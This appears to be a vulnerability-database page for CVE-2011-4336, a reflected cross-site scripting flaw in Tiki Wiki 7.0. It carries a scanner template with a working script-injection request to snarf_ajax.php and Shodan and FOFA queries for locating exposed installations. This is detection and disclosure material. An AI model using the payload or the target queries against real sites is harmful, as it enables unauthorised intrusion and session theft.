CVE-2011-4336: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting

2025-08-01 Tiki Wiki CMS Groupware 7.0 PoC Public

Description

Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.

PoC

id: CVE-2011-4336

info:
  name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
    - https://seclists.org/bugtraq/2011/Nov/140
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2011-4336
    cwe-id: CWE-79
    epss-score: 0.07652
    epss-percentile: 0.94267
    cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tiki
    product: tikiwiki_cms\/groupware
    shodan-query: http.html:"tiki wiki"
    fofa-query: body="tiki wiki"
  tags: cve,cve2011,seclists,xss,tikiwiki,tiki,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022020a52814d565c055e148bbb30fedcdede47e28bd7050b6d5a297a9b0b816b3a0022100cccc78b66e43ad40877016ff9709cab218965ef757717c2a018d8930862230c6:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities